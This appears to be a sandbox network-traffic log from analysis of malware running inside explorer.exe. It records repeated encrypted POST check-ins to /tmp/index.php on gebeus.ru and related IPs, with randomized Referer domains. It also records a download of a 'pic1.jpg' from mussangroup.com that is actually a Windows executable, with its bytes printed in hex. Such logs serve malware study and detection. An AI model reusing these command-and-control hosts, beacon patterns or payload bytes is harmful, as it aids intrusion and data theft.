                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.1049736189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:27.951421976 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://akvufandfxiqflw.net/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 254
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:56:27.951631069 CEST254OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 34 4f b6 9e
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu4O1SVoMX{"ClCca8_TQI1\I?d^CZ3`Z!BL@oM1&-#qeLQ/=d|MT'
                                                                                    Jul 24, 2024 19:56:29.005528927 CEST206INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:28 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c
                                                                                    Data Ascii: #\6U9H-anYp7vZW|


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.2.1049740189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:39.531964064 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://bqhvneiiyelqwiyv.net/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 130
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:56:39.531994104 CEST130OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 04 6b 2c 90 f4 76 0b 75 79 0f e8 bd
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA ,[k,vuy_L_XG3m+p/?o_3
                                                                                    Jul 24, 2024 19:56:40.621087074 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:40 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.2.1049742189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:40.629564047 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://oqgvummtqov.com/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 120
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:56:40.629585028 CEST120OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 67 02 da 99
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vuga)cDx'o~=_q9Zk
                                                                                    Jul 24, 2024 19:56:41.775023937 CEST137INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:41 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.2.1049743189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:41.935538054 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://vxvnjhhjwdcwv.com/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 289
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:56:41.935538054 CEST289OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 43 30 fc fb
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vuC0Vhy|>k3l[c{W!UH\l"?)Q2|k"@}n4JoHOkCG2cr,V1
                                                                                    Jul 24, 2024 19:56:43.052568913 CEST193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:42 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10
                                                                                    Data Ascii: #\6H=B1-lI*&


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.2.1049747189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:56:44.439362049 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://wagishcpburncp.com/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 365
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:56:44.439431906 CEST365OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1a 6b 2c 90 f4 76 0b 75 7c 4f b8 bc
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA ,[k,vu|OtATo];OHzsv#^[%//.SJ$'WwBRW,MBN0T`/kwPqb|wD:LRs
                                                                                    Jul 24, 2024 19:56:45.603816032 CEST484INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:56:45 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.2.1049815189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:57:58.393811941 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://rhafqfudulgf.org/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 345
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:57:58.393811941 CEST345OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 1d c4 a1
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA .[k,vu~o\B`icKg5jTdk~aDG,=2"zvV)5*axk,@Q/!E&:~.onJR`Co?I
                                                                                    Jul 24, 2024 19:57:59.444520950 CEST151INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:57:59 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                                    Data Ascii: r


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.2.1049825189.165.133.52803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:58:13.044200897 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://bmucdlsvjvamj.org/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 204
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:58:13.044217110 CEST204OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 46 26 e0 b8
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA .[k,vuF&mU]iH;!td,[y0D:/^}MQv`;@-txk].~2s(i
                                                                                    Jul 24, 2024 19:58:14.130640984 CEST151INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:58:13 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                                    Data Ascii: r


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.2.1049833211.168.53.110803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:58:30.098592043 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://ebgowpcalmic.org/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 187
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:58:30.098638058 CEST187OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 60 42 ea f8
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA .[k,vu`BR;~h-L\Rf&!6W))%=MvBS4Fs.b#t$(3
                                                                                    Jul 24, 2024 19:58:31.686600924 CEST151INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:58:31 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                                    Data Ascii: r


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.2.1049840211.168.53.110803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:58:43.690068960 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://kguhhqwlowh.com/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 224
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:58:43.690092087 CEST224OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 24 af e1
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA .[k,vu)$Nkx\_\~b9>GQDAP>ob*]6=$gkXV"xd!V)VMahn@ll
                                                                                    Jul 24, 2024 19:58:45.193727016 CEST151INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:58:44 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                                    Data Ascii: r


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.2.1049847211.168.53.110803968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jul 24, 2024 19:58:55.793935061 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Accept: */*
                                                                                    Referer: http://ajhanernmeqt.com/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Content-Length: 175
                                                                                    Host: gebeus.ru
                                                                                    Jul 24, 2024 19:58:55.793965101 CEST175OUTData Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 02 c4 a3
                                                                                    Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA .[k,vu+K2_H-bM]z<N]bOK_[B!s<Z;II9L
                                                                                    Jul 24, 2024 19:58:57.302325010 CEST151INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.0
                                                                                    Date: Wed, 24 Jul 2024 17:58:56 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                                    Data Ascii: r


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.1049737185.149.100.2424433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:29 UTC179OUTGET /wp-content/images/pic1.jpg HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Host: mussangroup.com
                                                                                    2024-07-24 17:56:30 UTC452INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    cache-control: public, max-age=604800
                                                                                    expires: Wed, 31 Jul 2024 17:56:29 GMT
                                                                                    content-type: image/jpeg
                                                                                    last-modified: Wed, 24 Jul 2024 11:31:45 GMT
                                                                                    accept-ranges: bytes
                                                                                    content-length: 11672576
                                                                                    date: Wed, 24 Jul 2024 17:56:29 GMT
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-07-24 17:56:30 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 2c 49 00 00 18 b2 00 00 80 09 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 10 bc 00 00 04 00 00 a4 34 b2 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$,I@4`
                                                                                    2024-07-24 17:56:30 UTC16384INData Raw: 49 3b 66 10 76 1d 55 48 89 e5 48 83 ec 18 48 8b 10 48 8b 48 08 48 89 d0 e8 a3 60 00 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 ee 67 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c2 cc cc 49 3b 66 10 0f 86 83 00 00 00 55 48 89 e5 48 83 ec 18 f3 0f 10 00 0f 57 c9 0f 2e c1 75 04 66 90 7b 4a 0f 2e c0 75 02 7b 33 48 89 5c 24 30 e8 cd 34 06 00 48 8b 4c 24 30 48 31 c8 48 b9 21 a6 56 6a a1 6e 75 00 48 31 c8 48 b9 bf 63 8f bb 6b ef 52 00 48 0f af c1 48 83 c4 18 5d c3 b9 04 00 00 00 e8 5a 85 06 00 48 83 c4 18 5d c3 48 b8 21 a6 56 6a a1 6e 75 00 48 31 d8 48 b9 bf 63 8f bb 6b ef 52 00 48 0f af c1 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 44 67 06 00 48 8b 44 24 08 48 8b 5c 24 10 e9 55 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                    Data Ascii: I;fvUHHHHHH`H]HD$H\$gHD$H\$I;fUHHW.uf{J.u{3H\$04HL$0H1H!VjnuH1HckRHH]ZH]H!VjnuH1HckRHH]HD$H\$DgHD$H\$U
                                                                                    2024-07-24 17:56:30 UTC16384INData Raw: e8 1b 2e 03 00 48 8d 05 0e df 65 00 bb 08 00 00 00 e8 8a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 fb 34 03 00 e8 36 30 03 00 e8 51 2e 03 00 48 8b 44 24 30 48 8b 88 d8 00 00 00 48 89 4c 24 18 e8 db 2d 03 00 48 8d 05 d6 de 65 00 bb 08 00 00 00 e8 4a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 bb 34 03 00 e8 f6 2f 03 00 e8 11 2e 03 00 48 8b 44 24 30 48 8b 88 e0 00 00 00 48 89 4c 24 18 e8 9b 2d 03 00 48 8d 05 9e de 65 00 bb 08 00 00 00 e8 0a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b 34 03 00 e8 b6 2f 03 00 e8 d1 2d 03 00 48 8b 44 24 30 48 8b 88 e8 00 00 00 48 89 4c 24 18 e8 5b 2d 03 00 48 8d 05 66 de 65 00 bb 08 00 00 00 e8 ca 35 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 3b 34 03 00 e8 76 2f 03 00 e8 91 2d 03 00 48 8b 44 24 30 48 8b 88 f0 00 00 00 48 89 4c 24
                                                                                    Data Ascii: .He6HD$D460Q.HD$0HHL$-HeJ6HD$D4/.HD$0HHL$-He6HD$D{4/-HD$0HHL$[-Hfe5HD$D;4v/-HD$0HHL$
                                                                                    2024-07-24 17:56:30 UTC16384INData Raw: 48 c1 e3 10 48 89 ce 81 e1 ff ff 07 00 48 09 cb 48 89 d9 48 c1 fb 13 48 c1 e3 03 90 90 90 66 90 48 39 da 74 05 eb 23 48 89 f0 48 8b 18 48 89 1a 48 89 c6 48 89 d8 f0 48 0f b1 0e 0f 94 c3 66 90 84 db 74 e3 48 83 c4 30 5d c3 48 89 54 24 28 48 89 74 24 18 48 89 4c 24 10 48 89 5c 24 20 66 90 e8 bb ed 02 00 48 8d 05 4a 2d 67 00 bb 2c 00 00 00 e8 2a f6 02 00 48 8b 44 24 28 0f 1f 44 00 00 e8 9b f5 02 00 48 8d 05 68 87 65 00 bb 05 00 00 00 e8 0a f6 02 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b f4 02 00 48 8d 05 ce 9e 65 00 bb 08 00 00 00 e8 ea f5 02 00 48 8b 44 24 10 0f 1f 44 00 00 e8 5b f4 02 00 48 8d 05 44 a7 65 00 bb 09 00 00 00 e8 ca f5 02 00 48 8b 44 24 20 0f 1f 44 00 00 e8 3b f5 02 00 e8 76 ef 02 00 e8 91 ed 02 00 48 8d 05 45 ca 65 00 bb 0c 00 00 00 0f 1f 44 00
                                                                                    Data Ascii: HHHHHHfH9t#HHHHHHftH0]HT$(Ht$HL$H\$ fHJ-g,*HD$(DHheHD$D{HeHD$D[HDeHD$ D;vHEeD
